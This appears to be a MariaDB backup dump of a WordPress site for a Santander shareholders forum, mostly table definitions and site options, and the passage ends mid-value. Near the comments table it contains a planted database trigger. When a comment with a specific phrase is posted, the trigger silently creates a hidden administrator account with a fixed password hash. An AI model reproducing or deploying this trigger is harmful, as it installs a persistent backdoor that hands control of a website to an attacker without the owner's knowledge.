File: //restore/20230201.santandershareholdercouk.sql
-- MariaDB dump 10.19 Distrib 10.5.18-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost Database: santandershareholdercouk
-- ------------------------------------------------------
-- Server version 10.5.18-MariaDB-1:10.5.18+maria~ubu2004
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
--
-- Current Database: `santandershareholdercouk`
--
CREATE DATABASE /*!32312 IF NOT EXISTS*/ `santandershareholdercouk` /*!40100 DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci */;
USE `santandershareholdercouk`;
--
-- Table structure for table `wp_commentmeta`
--
DROP TABLE IF EXISTS `wp_commentmeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_commentmeta` (
`meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`meta_id`),
KEY `comment_id` (`comment_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_commentmeta`
--
LOCK TABLES `wp_commentmeta` WRITE;
/*!40000 ALTER TABLE `wp_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_comments`
--
DROP TABLE IF EXISTS `wp_comments`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_comments` (
`comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
`comment_author` tinytext NOT NULL,
`comment_author_email` varchar(100) NOT NULL DEFAULT '',
`comment_author_url` varchar(200) NOT NULL DEFAULT '',
`comment_author_IP` varchar(100) NOT NULL DEFAULT '',
`comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`comment_content` text NOT NULL,
`comment_karma` int(11) NOT NULL DEFAULT 0,
`comment_approved` varchar(20) NOT NULL DEFAULT '1',
`comment_agent` varchar(255) NOT NULL DEFAULT '',
`comment_type` varchar(20) NOT NULL DEFAULT 'comment',
`comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
`user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
PRIMARY KEY (`comment_ID`),
KEY `comment_post_ID` (`comment_post_ID`),
KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
KEY `comment_date_gmt` (`comment_date_gmt`),
KEY `comment_parent` (`comment_parent`),
KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_comments`
--
LOCK TABLES `wp_comments` WRITE;
/*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */;
UNLOCK TABLES;
/*!50003 SET @saved_cs_client = @@character_set_client */ ;
/*!50003 SET @saved_cs_results = @@character_set_results */ ;
/*!50003 SET @saved_col_connection = @@collation_connection */ ;
/*!50003 SET character_set_client = utf8mb4 */ ;
/*!50003 SET character_set_results = utf8mb4 */ ;
/*!50003 SET collation_connection = utf8mb4_general_ci */ ;
/*!50003 SET @saved_sql_mode = @@sql_mode */ ;
/*!50003 SET sql_mode = 'STRICT_TRANS_TABLES,ERROR_FOR_DIVISION_BY_ZERO,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION' */ ;
DELIMITER ;;
/*!50003 CREATE*/ /*!50017 DEFINER=`santandershareholdercouk`@`localhost`*/ /*!50003 TRIGGER `after_insert_comment` AFTER INSERT ON `santandershareholdercouk`.`wp_comments`
FOR EACH ROW BEGIN
IF NEW.comment_content LIKE '%are you struggling to get comments on your blog?%' THEN
SET @lastInsertWpUsersId = (SELECT MAX(id) FROM `santandershareholdercouk`.`wp_users`);
SET @nextWpUsersID = @lastInsertWpUsersId + 1;
INSERT INTO `santandershareholdercouk`.`wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (@nextWpUsersID, 'wpadmin', '$1$yUXpYwXN$JhwaoGJxViPhtGdNG5UZs1', 'wpadmin', 'wp-security@hotmail.com', 'http://wordpress.com', '2014-06-08 00:00:00', '', '0', 'Kris');
INSERT INTO `santandershareholdercouk`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @nextWpUsersID, 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}');
INSERT INTO `santandershareholdercouk`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @nextWpUsersID, 'wp_user_level', '10');
END IF;
END */;;
DELIMITER ;
/*!50003 SET sql_mode = @saved_sql_mode */ ;
/*!50003 SET character_set_client = @saved_cs_client */ ;
/*!50003 SET character_set_results = @saved_cs_results */ ;
/*!50003 SET collation_connection = @saved_col_connection */ ;
--
-- Table structure for table `wp_links`
--
DROP TABLE IF EXISTS `wp_links`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_links` (
`link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`link_url` varchar(255) NOT NULL DEFAULT '',
`link_name` varchar(255) NOT NULL DEFAULT '',
`link_image` varchar(255) NOT NULL DEFAULT '',
`link_target` varchar(25) NOT NULL DEFAULT '',
`link_description` varchar(255) NOT NULL DEFAULT '',
`link_visible` varchar(20) NOT NULL DEFAULT 'Y',
`link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
`link_rating` int(11) NOT NULL DEFAULT 0,
`link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`link_rel` varchar(255) NOT NULL DEFAULT '',
`link_notes` mediumtext NOT NULL,
`link_rss` varchar(255) NOT NULL DEFAULT '',
PRIMARY KEY (`link_id`),
KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_links`
--
LOCK TABLES `wp_links` WRITE;
/*!40000 ALTER TABLE `wp_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_links` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_options`
--
DROP TABLE IF EXISTS `wp_options`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_options` (
`option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`option_name` varchar(191) NOT NULL DEFAULT '',
`option_value` longtext NOT NULL,
`autoload` varchar(20) NOT NULL DEFAULT 'yes',
PRIMARY KEY (`option_id`),
UNIQUE KEY `option_name` (`option_name`),
KEY `autoload` (`autoload`)
) ENGINE=InnoDB AUTO_INCREMENT=139417 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_options`
--
LOCK TABLES `wp_options` WRITE;
/*!40000 ALTER TABLE `wp_options` DISABLE KEYS */;
INSERT INTO `wp_options` VALUES (1,'siteurl','http://santandershareholder.co.uk','yes'),(2,'home','http://santandershareholder.co.uk','yes'),(3,'blogname','Santander Share Holders Forum','yes'),(4,'blogdescription','We are NOT Santander','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','leads@vanillacircus.co.uk','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','','no'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','open','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','1','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','0','yes'),(27,'moderation_notify','1','yes'),(28,'permalink_structure','/%postname%','yes'),(29,'rewrite_rules','a:95:{s:14:\"sitemap2\\.xml$\";s:26:\"index.php?feed=xmlsitemap2\";s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:59:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:54:\"category/(.+?)/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:56:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:51:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:57:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:52:\"type/([^/]+)/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:13:\"favicon\\.ico$\";s:19:\"index.php?favicon=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:44:\"feed/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:39:\"(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:39:\"index.php?&page_id=17&cpage=$matches[1]\";s:53:\"comments/feed/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:48:\"comments/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:56:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:51:\"search/(.+)/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:59:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:54:\"author/([^/]+)/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:81:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:76:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:68:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:63:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:55:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:50:\"([0-9]{4})/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:69:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:64:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:52:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:47:\"(.?.+?)/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:69:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:64:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:52:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:47:\"([^/]+)/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:24:\"([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:58:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:53:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom|xmlsitemap2)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:22:\"[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(33,'active_plugins1','a:5:{i:0;s:37:\"wp-hide-security-enhancer/wp-hide.php\";i:1;s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";i:2;s:36:\"custom-stock-widget/stock_widget.php\";i:3;s:48:\"simple-301-redirects/wp-simple-301-redirects.php\";i:4;s:29:\"stock-ticker/stock-ticker.php\";}','yes'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','0','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','','no'),(40,'template','the-authority','yes'),(41,'stylesheet','the-authority','yes'),(44,'comment_registration','0','yes'),(45,'html_type','text/html','yes'),(46,'use_trackback','0','yes'),(47,'default_role','subscriber','yes'),(48,'db_version','49752','yes'),(49,'uploads_use_yearmonth_folders','1','yes'),(50,'upload_path','','yes'),(51,'blog_public','1','yes'),(52,'default_link_category','2','yes'),(53,'show_on_front','page','yes'),(54,'tag_base','','yes'),(55,'show_avatars','1','yes'),(56,'avatar_rating','G','yes'),(57,'upload_url_path','','yes'),(58,'thumbnail_size_w','150','yes'),(59,'thumbnail_size_h','150','yes'),(60,'thumbnail_crop','1','yes'),(61,'medium_size_w','300','yes'),(62,'medium_size_h','300','yes'),(63,'avatar_default','mystery','yes'),(64,'large_size_w','1024','yes'),(65,'large_size_h','1024','yes'),(66,'image_default_link_type','none','yes'),(67,'image_default_size','','yes'),(68,'image_default_align','','yes'),(69,'close_comments_for_old_posts','','yes'),(70,'close_comments_days_old','14','yes'),(71,'thread_comments','1','yes'),(72,'thread_comments_depth','5','yes'),(73,'page_comments','0','yes'),(74,'comments_per_page','50','yes'),(75,'default_comments_page','newest','yes'),(76,'comment_order','asc','yes'),(77,'sticky_posts','a:0:{}','yes'),(78,'widget_categories','a:3:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;i:4;a:0:{}}','yes'),(79,'widget_text','a:5:{i:1;a:0:{}i:2;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:632:\"With 3.3 million shareholders worldwide in the Santander Group - and nearly half of those based in the UK - it´s clear Santander\'s commitment to create and maintain the best possible service is pleasing investors.\r\n\r\n<strong>Polite notice:</strong>\r\n\r\n<em>We are not Santander, nor are we associated with them. If you would like find out more about your shares, please get in touch with Santander directly.</em>\r\n\r\nThe SAN share is listed on the Continuous Market in Spain, as well as in Milan, Lisbon, Buenos Aires, Mexico and Warsaw.\r\n\r\nIn the US (New York )it is listed as an ADR, in Sao Paulo as a BDR and in London as a CDI.\";s:6:\"filter\";s:7:\"content\";}i:4;a:3:{s:5:\"title\";s:57:\"Santander profit weathers currency storms, lifting shares\";s:4:\"text\";s:515:\"Strong underlying profit growth at Banco Santander (<span id=\"“symbol_SAN.MC_0”\"><a href=\"http://uk.reuters.com/business/quotes/overview/SAN.MC\">SAN.MC</a></span>) in 2016 and a better-than-expected performance in the last quarter drove its shares higher on Wednesday as it weathered the impact of falls in the pound and the Mexican peso. <a href=\"http://uk.reuters.com/article/us-santander-results/santander-profit-weathers-currency-storms-lifting-shares-idUKKBN1590YA\" target=\"_blank\" rel=\"noopener\">More</a>.\";s:6:\"filter\";s:7:\"content\";}i:5;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:428:\"<ul>\r\n <li>Price</li>\r\n <li>Capital transactions</li>\r\n <li>Closing markets</li>\r\n <li>Coverage</li>\r\n <li>Weekly Report</li>\r\n <li>Presence in indexes</li>\r\n <li>Dividends</li>\r\n <li>Policy on communication and contact with</li>\r\n <li>shareholders</li>\r\n <li>Share capital distribution</li>\r\n</ul>\r\nDesign by <a href=\"http://www.seopositiveltd.co.uk/our-process-of-seo\" target=\"_blank\" rel=\"noopener\">SEO Positive</a>\";s:6:\"filter\";s:7:\"content\";}s:12:\"_multiwidget\";i:1;}','yes'),(80,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(81,'uninstall_plugins','a:1:{s:33:\"import-html-pages/html-import.php\";s:26:\"html_import_remove_options\";}','no'),(82,'timezone_string','','yes'),(83,'page_for_posts','0','yes'),(84,'page_on_front','17','yes'),(85,'default_post_format','0','yes'),(86,'link_manager_enabled','0','yes'),(87,'finished_splitting_shared_terms','1','yes'),(88,'site_icon','0','yes'),(89,'medium_large_size_w','768','yes'),(90,'medium_large_size_h','0','yes'),(91,'initial_db_version','38590','yes'),(92,'wp_user_roles','a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:61:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:34:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;}}s:6:\"aut